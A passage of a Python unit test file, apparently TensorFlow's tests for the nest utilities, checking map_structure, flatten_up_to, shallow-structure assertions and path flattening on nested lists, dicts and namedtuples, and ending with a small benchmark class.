nest.map_structure(lambda x, y: None, ((3, 4), 5), (3, (4, 5)),
check_types=False)
with self.assertRaisesRegexp(ValueError,
"Only valid keyword argument.*foo"):
nest.map_structure(lambda x: None, structure1, foo="a")
with self.assertRaisesRegexp(ValueError,
"Only valid keyword argument.*foo"):
nest.map_structure(lambda x: None, structure1, check_types=False, foo="a")
ABTuple = collections.namedtuple("ab_tuple", "a, b") # pylint: disable=invalid-name
@test_util.assert_no_new_pyobjects_executing_eagerly
def testMapStructureWithStrings(self):
inp_a = NestTest.ABTuple(a="foo", b=("bar", "baz"))
inp_b = NestTest.ABTuple(a=2, b=(1, 3))
out = nest.map_structure(lambda string, repeats: string * repeats,
inp_a,
inp_b)
self.assertEqual("foofoo", out.a)
self.assertEqual("bar", out.b[0])
self.assertEqual("bazbazbaz", out.b[1])
nt = NestTest.ABTuple(a=("something", "something_else"),
b="yet another thing")
rev_nt = nest.map_structure(lambda x: x[::-1], nt)
# Check the output is the correct structure, and all strings are reversed.
nest.assert_same_structure(nt, rev_nt)
self.assertEqual(nt.a[0][::-1], rev_nt.a[0])
self.assertEqual(nt.a[1][::-1], rev_nt.a[1])
self.assertEqual(nt.b[::-1], rev_nt.b)
@test_util.run_deprecated_v1
def testMapStructureOverPlaceholders(self):
inp_a = (array_ops.placeholder(dtypes.float32, shape=[3, 4]),
array_ops.placeholder(dtypes.float32, shape=[3, 7]))
inp_b = (array_ops.placeholder(dtypes.float32, shape=[3, 4]),
array_ops.placeholder(dtypes.float32, shape=[3, 7]))
output = nest.map_structure(lambda x1, x2: x1 + x2, inp_a, inp_b)
nest.assert_same_structure(output, inp_a)
self.assertShapeEqual(np.zeros((3, 4)), output[0])
self.assertShapeEqual(np.zeros((3, 7)), output[1])
feed_dict = {
inp_a: (np.random.randn(3, 4), np.random.randn(3, 7)),
inp_b: (np.random.randn(3, 4), np.random.randn(3, 7))
}
with self.cached_session() as sess:
output_np = sess.run(output, feed_dict=feed_dict)
self.assertAllClose(output_np[0],
feed_dict[inp_a][0] + feed_dict[inp_b][0])
self.assertAllClose(output_np[1],
feed_dict[inp_a][1] + feed_dict[inp_b][1])
def testAssertShallowStructure(self):
inp_ab = ["a", "b"]
inp_abc = ["a", "b", "c"]
with self.assertRaisesWithLiteralMatch( # pylint: disable=g-error-prone-assert-raises
ValueError,
nest._STRUCTURES_HAVE_MISMATCHING_LENGTHS.format(
input_length=len(inp_ab),
shallow_length=len(inp_abc))):
nest.assert_shallow_structure(inp_abc, inp_ab)
inp_ab1 = [(1, 1), (2, 2)]
inp_ab2 = [[1, 1], [2, 2]]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._STRUCTURES_HAVE_MISMATCHING_TYPES.format(
shallow_type=type(inp_ab2[0]),
input_type=type(inp_ab1[0]))):
nest.assert_shallow_structure(inp_ab2, inp_ab1)
nest.assert_shallow_structure(inp_ab2, inp_ab1, check_types=False)
inp_ab1 = {"a": (1, 1), "b": {"c": (2, 2)}}
inp_ab2 = {"a": (1, 1), "b": {"d": (2, 2)}}
with self.assertRaisesWithLiteralMatch(
ValueError,
nest._SHALLOW_TREE_HAS_INVALID_KEYS.format(["d"])):
nest.assert_shallow_structure(inp_ab2, inp_ab1)
inp_ab = collections.OrderedDict([("a", 1), ("b", (2, 3))])
inp_ba = collections.OrderedDict([("b", (2, 3)), ("a", 1)])
nest.assert_shallow_structure(inp_ab, inp_ba)
# This assertion is expected to pass: two namedtuples with the same
# name and field names are considered to be identical.
inp_shallow = NestTest.SameNameab(1, 2)
inp_deep = NestTest.SameNameab2(1, [1, 2, 3])
nest.assert_shallow_structure(inp_shallow, inp_deep, check_types=False)
nest.assert_shallow_structure(inp_shallow, inp_deep, check_types=True)
def testFlattenUpTo(self):
# Shallow tree ends at scalar.
input_tree = [[[2, 2], [3, 3]], [[4, 9], [5, 5]]]
shallow_tree = [[True, True], [False, True]]
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [[2, 2], [3, 3], [4, 9], [5, 5]])
self.assertEqual(flattened_shallow_tree, [True, True, False, True])
# Shallow tree ends at string.
input_tree = [[("a", 1), [("b", 2), [("c", 3), [("d", 4)]]]]]
shallow_tree = [["level_1", ["level_2", ["level_3", ["level_4"]]]]]
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
input_tree_flattened = nest.flatten(input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[("a", 1), ("b", 2), ("c", 3), ("d", 4)])
self.assertEqual(input_tree_flattened, ["a", 1, "b", 2, "c", 3, "d", 4])
# Make sure dicts are correctly flattened, yielding values, not keys.
input_tree = {"a": 1, "b": {"c": 2}, "d": [3, (4, 5)]}
shallow_tree = {"a": 0, "b": 0, "d": [0, 0]}
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[1, {"c": 2}, 3, (4, 5)])
# Namedtuples.
ab_tuple = NestTest.ABTuple
input_tree = ab_tuple(a=[0, 1], b=2)
shallow_tree = ab_tuple(a=0, b=1)
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[[0, 1], 2])
# Nested dicts, OrderedDicts and namedtuples.
input_tree = collections.OrderedDict(
[("a", ab_tuple(a=[0, {"b": 1}], b=2)),
("c", {"d": 3, "e": collections.OrderedDict([("f", 4)])})])
shallow_tree = input_tree
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree, [0, 1, 2, 3, 4])
shallow_tree = collections.OrderedDict([("a", 0), ("c", {"d": 3, "e": 1})])
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[ab_tuple(a=[0, {"b": 1}], b=2),
3,
collections.OrderedDict([("f", 4)])])
shallow_tree = collections.OrderedDict([("a", 0), ("c", 0)])
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[ab_tuple(a=[0, {"b": 1}], b=2),
{"d": 3, "e": collections.OrderedDict([("f", 4)])}])
## Shallow non-list edge-case.
# Using iterable elements.
input_tree = ["input_tree"]
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = ["input_tree_0", "input_tree_1"]
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = [0]
shallow_tree = 9
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = [0, 1]
shallow_tree = 9
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Both non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = 0
shallow_tree = 0
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Input non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = ["shallow_tree"]
expected_message = ("If shallow structure is a sequence, input must also "
"be a sequence. Input has type: <(type|class) 'str'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = "input_tree"
shallow_tree = ["shallow_tree_9", "shallow_tree_8"]
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, shallow_tree)
# Using non-iterable elements.
input_tree = 0
shallow_tree = [9]
expected_message = ("If shallow structure is a sequence, input must also "
"be a sequence. Input has type: <(type|class) 'int'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = 0
shallow_tree = [9, 8]
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = [(1,), (2,), 3]
shallow_tree = [(1,), (2,)]
expected_message = nest._STRUCTURES_HAVE_MISMATCHING_LENGTHS.format(
input_length=len(input_tree), shallow_length=len(shallow_tree))
with self.assertRaisesRegexp(ValueError, expected_message): # pylint: disable=g-error-prone-assert-raises
nest.assert_shallow_structure(shallow_tree, input_tree)
def testFlattenWithTuplePathsUpTo(self):
def get_paths_and_values(shallow_tree, input_tree):
path_value_pairs = nest.flatten_with_tuple_paths_up_to(
shallow_tree, input_tree)
paths = [p for p, _ in path_value_pairs]
values = [v for _, v in path_value_pairs]
return paths, values
# Shallow tree ends at scalar.
input_tree = [[[2, 2], [3, 3]], [[4, 9], [5, 5]]]
shallow_tree = [[True, True], [False, True]]
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths,
[(0, 0), (0, 1), (1, 0), (1, 1)])
self.assertEqual(flattened_input_tree, [[2, 2], [3, 3], [4, 9], [5, 5]])
self.assertEqual(flattened_shallow_tree_paths,
[(0, 0), (0, 1), (1, 0), (1, 1)])
self.assertEqual(flattened_shallow_tree, [True, True, False, True])
# Shallow tree ends at string.
input_tree = [[("a", 1), [("b", 2), [("c", 3), [("d", 4)]]]]]
shallow_tree = [["level_1", ["level_2", ["level_3", ["level_4"]]]]]
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
input_tree_flattened_paths = [p for p, _ in
nest.flatten_with_tuple_paths(input_tree)]
input_tree_flattened = nest.flatten(input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[(0, 0), (0, 1, 0), (0, 1, 1, 0), (0, 1, 1, 1, 0)])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[("a", 1), ("b", 2), ("c", 3), ("d", 4)])
self.assertEqual(input_tree_flattened_paths,
[(0, 0, 0), (0, 0, 1),
(0, 1, 0, 0), (0, 1, 0, 1),
(0, 1, 1, 0, 0), (0, 1, 1, 0, 1),
(0, 1, 1, 1, 0, 0), (0, 1, 1, 1, 0, 1)])
self.assertEqual(input_tree_flattened, ["a", 1, "b", 2, "c", 3, "d", 4])
# Make sure dicts are correctly flattened, yielding values, not keys.
input_tree = {"a": 1, "b": {"c": 2}, "d": [3, (4, 5)]}
shallow_tree = {"a": 0, "b": 0, "d": [0, 0]}
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a",), ("b",), ("d", 0), ("d", 1)])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[1, {"c": 2}, 3, (4, 5)])
# Namedtuples.
ab_tuple = collections.namedtuple("ab_tuple", "a, b")
input_tree = ab_tuple(a=[0, 1], b=2)
shallow_tree = ab_tuple(a=0, b=1)
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a",), ("b",)])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[[0, 1], 2])
# Nested dicts, OrderedDicts and namedtuples.
input_tree = collections.OrderedDict(
[("a", ab_tuple(a=[0, {"b": 1}], b=2)),
("c", {"d": 3, "e": collections.OrderedDict([("f", 4)])})])
shallow_tree = input_tree
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a", "a", 0),
("a", "a", 1, "b"),
("a", "b"),
("c", "d"),
("c", "e", "f")])
self.assertEqual(input_tree_flattened_as_shallow_tree, [0, 1, 2, 3, 4])
shallow_tree = collections.OrderedDict([("a", 0), ("c", {"d": 3, "e": 1})])
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a",),
("c", "d"),
("c", "e")])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[ab_tuple(a=[0, {"b": 1}], b=2),
3,
collections.OrderedDict([("f", 4)])])
shallow_tree = collections.OrderedDict([("a", 0), ("c", 0)])
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a",), ("c",)])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[ab_tuple(a=[0, {"b": 1}], b=2),
{"d": 3, "e": collections.OrderedDict([("f", 4)])}])
## Shallow non-list edge-case.
# Using iterable elements.
input_tree = ["input_tree"]
shallow_tree = "shallow_tree"
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = ["input_tree_0", "input_tree_1"]
shallow_tree = "shallow_tree"
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Test case where len(shallow_tree) < len(input_tree)
input_tree = {"a": "A", "b": "B", "c": "C"}
shallow_tree = {"a": 1, "c": 2}
with self.assertRaisesWithLiteralMatch( # pylint: disable=g-error-prone-assert-raises
ValueError,
nest._STRUCTURES_HAVE_MISMATCHING_LENGTHS.format(
input_length=len(input_tree),
shallow_length=len(shallow_tree))):
get_paths_and_values(shallow_tree, input_tree)
# Using non-iterable elements.
input_tree = [0]
shallow_tree = 9
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = [0, 1]
shallow_tree = 9
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Both non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = "shallow_tree"
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = 0
shallow_tree = 0
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Input non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = ["shallow_tree"]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._IF_SHALLOW_IS_SEQ_INPUT_MUST_BE_SEQ.format(type(input_tree))):
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree_paths, [(0,)])
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = "input_tree"
shallow_tree = ["shallow_tree_9", "shallow_tree_8"]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._IF_SHALLOW_IS_SEQ_INPUT_MUST_BE_SEQ.format(type(input_tree))):
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree_paths, [(0,), (1,)])
self.assertEqual(flattened_shallow_tree, shallow_tree)
# Using non-iterable elements.
input_tree = 0
shallow_tree = [9]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._IF_SHALLOW_IS_SEQ_INPUT_MUST_BE_SEQ.format(type(input_tree))):
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree_paths, [(0,)])
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = 0
shallow_tree = [9, 8]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._IF_SHALLOW_IS_SEQ_INPUT_MUST_BE_SEQ.format(type(input_tree))):
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree_paths, [(0,), (1,)])
self.assertEqual(flattened_shallow_tree, shallow_tree)
def testMapStructureUpTo(self):
# Named tuples.
ab_tuple = collections.namedtuple("ab_tuple", "a, b")
op_tuple = collections.namedtuple("op_tuple", "add, mul")
inp_val = ab_tuple(a=2, b=3)
inp_ops = ab_tuple(a=op_tuple(add=1, mul=2), b=op_tuple(add=2, mul=3))
out = nest.map_structure_up_to(
inp_val, lambda val, ops: (val + ops.add) * ops.mul, inp_val, inp_ops)
self.assertEqual(out.a, 6)
self.assertEqual(out.b, 15)
# Lists.
data_list = [[2, 4, 6, 8], [[1, 3, 5, 7, 9], [3, 5, 7]]]
name_list = ["evens", ["odds", "primes"]]
out = nest.map_structure_up_to(
name_list, lambda name, sec: "first_{}_{}".format(len(sec), name),
name_list, data_list)
self.assertEqual(out, ["first_4_evens", ["first_5_odds", "first_3_primes"]])
# Dicts.
inp_val = dict(a=2, b=3)
inp_ops = dict(a=dict(add=1, mul=2), b=dict(add=2, mul=3))
out = nest.map_structure_up_to(
inp_val,
lambda val, ops: (val + ops["add"]) * ops["mul"], inp_val, inp_ops)
self.assertEqual(out["a"], 6)
self.assertEqual(out["b"], 15)
# Non-equal dicts.
inp_val = dict(a=2, b=3)
inp_ops = dict(a=dict(add=1, mul=2), c=dict(add=2, mul=3))
with self.assertRaisesWithLiteralMatch(
ValueError,
nest._SHALLOW_TREE_HAS_INVALID_KEYS.format(["b"])):
nest.map_structure_up_to(
inp_val,
lambda val, ops: (val + ops["add"]) * ops["mul"], inp_val, inp_ops)
# Dict+custom mapping.
inp_val = dict(a=2, b=3)
inp_ops = _CustomMapping(a=dict(add=1, mul=2), b=dict(add=2, mul=3))
out = nest.map_structure_up_to(
inp_val,
lambda val, ops: (val + ops["add"]) * ops["mul"], inp_val, inp_ops)
self.assertEqual(out["a"], 6)
self.assertEqual(out["b"], 15)
# Non-equal dict/mapping.
inp_val = dict(a=2, b=3)
inp_ops = _CustomMapping(a=dict(add=1, mul=2), c=dict(add=2, mul=3))
with self.assertRaisesWithLiteralMatch(
ValueError,
nest._SHALLOW_TREE_HAS_INVALID_KEYS.format(["b"])):
nest.map_structure_up_to(
inp_val,
lambda val, ops: (val + ops["add"]) * ops["mul"], inp_val, inp_ops)
def testGetTraverseShallowStructure(self):
scalar_traverse_input = [3, 4, (1, 2, [0]), [5, 6], {"a": (7,)}, []]
scalar_traverse_r = nest.get_traverse_shallow_structure(
lambda s: not isinstance(s, tuple),
scalar_traverse_input)
self.assertEqual(scalar_traverse_r,
[True, True, False, [True, True], {"a": False}, []])
nest.assert_shallow_structure(scalar_traverse_r,
scalar_traverse_input)
structure_traverse_input = [(1, [2]), ([1], 2)]
structure_traverse_r = nest.get_traverse_shallow_structure(
lambda s: (True, False) if isinstance(s, tuple) else True,
structure_traverse_input)
self.assertEqual(structure_traverse_r,
[(True, False), ([True], False)])
nest.assert_shallow_structure(structure_traverse_r,
structure_traverse_input)
with self.assertRaisesRegexp(TypeError, "returned structure"):
nest.get_traverse_shallow_structure(lambda _: [True], 0)
with self.assertRaisesRegexp(TypeError, "returned a non-bool scalar"):
nest.get_traverse_shallow_structure(lambda _: 1, [1])
with self.assertRaisesRegexp(
TypeError, "didn't return a depth=1 structure of bools"):
nest.get_traverse_shallow_structure(lambda _: [1], [1])
def testYieldFlatStringPaths(self):
for inputs_expected in ({"inputs": [], "expected": []},
{"inputs": 3, "expected": [()]},
{"inputs": [3], "expected": [(0,)]},
{"inputs": {"a": 3}, "expected": [("a",)]},
{"inputs": {"a": {"b": 4}},
"expected": [("a", "b")]},
{"inputs": [{"a": 2}], "expected": [(0, "a")]},
{"inputs": [{"a": [2]}], "expected": [(0, "a", 0)]},
{"inputs": [{"a": [(23, 42)]}],
"expected": [(0, "a", 0, 0), (0, "a", 0, 1)]},
{"inputs": [{"a": ([23], 42)}],
"expected": [(0, "a", 0, 0), (0, "a", 1)]},
{"inputs": {"a": {"a": 2}, "c": [[[4]]]},
"expected": [("a", "a"), ("c", 0, 0, 0)]},
{"inputs": {"0": [{"1": 23}]},
"expected": [("0", 0, "1")]}):
inputs = inputs_expected["inputs"]
expected = inputs_expected["expected"]
self.assertEqual(list(nest.yield_flat_paths(inputs)), expected)
# We cannot define namedtuples within @parameterized argument lists.
# pylint: disable=invalid-name
Foo = collections.namedtuple("Foo", ["a", "b"])
Bar = collections.namedtuple("Bar", ["c", "d"])
# pylint: enable=invalid-name
@parameterized.parameters([
dict(inputs=[], expected=[]),
dict(inputs=[23, "42"], expected=[("0", 23), ("1", "42")]),
dict(inputs=[[[[108]]]], expected=[("0/0/0/0", 108)]),
dict(inputs=Foo(a=3, b=Bar(c=23, d=42)),
expected=[("a", 3), ("b/c", 23), ("b/d", 42)]),
dict(inputs=Foo(a=Bar(c=23, d=42), b=Bar(c=0, d="thing")),
expected=[("a/c", 23), ("a/d", 42), ("b/c", 0), ("b/d", "thing")]),
dict(inputs=Bar(c=42, d=43),
expected=[("c", 42), ("d", 43)]),
dict(inputs=Bar(c=[42], d=43),
expected=[("c/0", 42), ("d", 43)]),
])
def testFlattenWithStringPaths(self, inputs, expected):
self.assertEqual(
nest.flatten_with_joined_string_paths(inputs, separator="/"),
expected)
@parameterized.parameters([
dict(inputs=[], expected=[]),
dict(inputs=[23, "42"], expected=[((0,), 23), ((1,), "42")]),
dict(inputs=[[[[108]]]], expected=[((0, 0, 0, 0), 108)]),
dict(inputs=Foo(a=3, b=Bar(c=23, d=42)),
expected=[(("a",), 3), (("b", "c"), 23), (("b", "d"), 42)]),
dict(inputs=Foo(a=Bar(c=23, d=42), b=Bar(c=0, d="thing")),
expected=[(("a", "c"), 23), (("a", "d"), 42), (("b", "c"), 0),
(("b", "d"), "thing")]),
dict(inputs=Bar(c=42, d=43),
expected=[(("c",), 42), (("d",), 43)]),
dict(inputs=Bar(c=[42], d=43),
expected=[(("c", 0), 42), (("d",), 43)]),
])
def testFlattenWithTuplePaths(self, inputs, expected):
self.assertEqual(nest.flatten_with_tuple_paths(inputs), expected)
@parameterized.named_parameters(
("tuples", (1, 2), (3, 4), True, (("0", 4), ("1", 6))),
("dicts", {"a": 1, "b": 2}, {"b": 4, "a": 3}, True,
{"a": ("a", 4), "b": ("b", 6)}),
("mixed", (1, 2), [3, 4], False, (("0", 4), ("1", 6))),
("nested",
{"a": [2, 3], "b": [1, 2, 3]}, {"b": [5, 6, 7], "a": [8, 9]}, True,
{"a": [("a/0", 10), ("a/1", 12)],
"b": [("b/0", 6), ("b/1", 8), ("b/2", 10)]}))
def testMapWithPathsCompatibleStructures(self, s1, s2, check_types, expected):
def format_sum(path, *values):
return (path, sum(values))
result = nest.map_structure_with_paths(format_sum, s1, s2,
check_types=check_types)
self.assertEqual(expected, result)
@parameterized.named_parameters(
("tuples", (1, 2, 3), (4, 5), ValueError),
("dicts", {"a": 1}, {"b": 2}, ValueError),
("mixed", (1, 2), [3, 4], TypeError),
("nested",
{"a": [2, 3, 4], "b": [1, 3]},
{"b": [5, 6], "a": [8, 9]},
ValueError
))
def testMapWithPathsIncompatibleStructures(self, s1, s2, error_type):
with self.assertRaises(error_type):
nest.map_structure_with_paths(lambda path, *s: 0, s1, s2)
@parameterized.named_parameters([
dict(testcase_name="Tuples", s1=(1, 2), s2=(3, 4),
check_types=True, expected=(((0,), 4), ((1,), 6))),
dict(testcase_name="Dicts", s1={"a": 1, "b": 2}, s2={"b": 4, "a": 3},
check_types=True, expected={"a": (("a",), 4), "b": (("b",), 6)}),
dict(testcase_name="Mixed", s1=(1, 2), s2=[3, 4],
check_types=False, expected=(((0,), 4), ((1,), 6))),
dict(testcase_name="Nested",
s1={"a": [2, 3], "b": [1, 2, 3]},
s2={"b": [5, 6, 7], "a": [8, 9]},
check_types=True,
expected={"a": [(("a", 0), 10), (("a", 1), 12)],
"b": [(("b", 0), 6), (("b", 1), 8), (("b", 2), 10)]}),
])
def testMapWithTuplePathsCompatibleStructures(
self, s1, s2, check_types, expected):
def path_and_sum(path, *values):
return path, sum(values)
result = nest.map_structure_with_tuple_paths(
path_and_sum, s1, s2, check_types=check_types)
self.assertEqual(expected, result)
@parameterized.named_parameters([
dict(testcase_name="Tuples", s1=(1, 2, 3), s2=(4, 5),
error_type=ValueError),
dict(testcase_name="Dicts", s1={"a": 1}, s2={"b": 2},
error_type=ValueError),
dict(testcase_name="Mixed", s1=(1, 2), s2=[3, 4], error_type=TypeError),
dict(testcase_name="Nested",
s1={"a": [2, 3, 4], "b": [1, 3]},
s2={"b": [5, 6], "a": [8, 9]},
error_type=ValueError)
])
def testMapWithTuplePathsIncompatibleStructures(self, s1, s2, error_type):
with self.assertRaises(error_type):
nest.map_structure_with_tuple_paths(lambda path, *s: 0, s1, s2)
def testFlattenCustomSequenceThatRaisesException(self): # b/140746865
seq = _CustomSequenceThatRaisesException()
with self.assertRaisesRegexp(ValueError, "Cannot get item"):
nest.flatten(seq)
def testListToTuple(self):
input_sequence = [1, (2, {3: [4, 5, (6,)]}, None, 7, [[[8]]])]
expected = (1, (2, {3: (4, 5, (6,))}, None, 7, (((8,),),)))
nest.assert_same_structure(
nest.list_to_tuple(input_sequence),
expected,
)
class NestBenchmark(test.Benchmark):
def run_and_report(self, s1, s2, name):
burn_iter, test_iter = 100, 30000
for _ in xrange(burn_iter):
nest.assert_same_structure(s1, s2)
t0 = time.time()
for _ in xrange(test_iter):
nest.assert_same_structure(s1, s2)
t1 = time.time()
self.report_benchmark(iters=test_iter, wall_time=(t1 - t0) / test_iter,
name=name)
def benchmark_assert_structure(self):
s1 = (((1, 2), 3), 4, (5, 6))
s2 = ((("foo1", "foo2"), "foo3"), "foo4", ("foo5", "foo6"))
self.run_and_report(s1, s2, "assert_same_structure_6_elem")
s1 = (((1, 2), 3), 4, (5, 6)) * 10
s2 = ((("foo1", "foo2"), "foo3"), "foo4", ("foo5", "foo6")) * 10
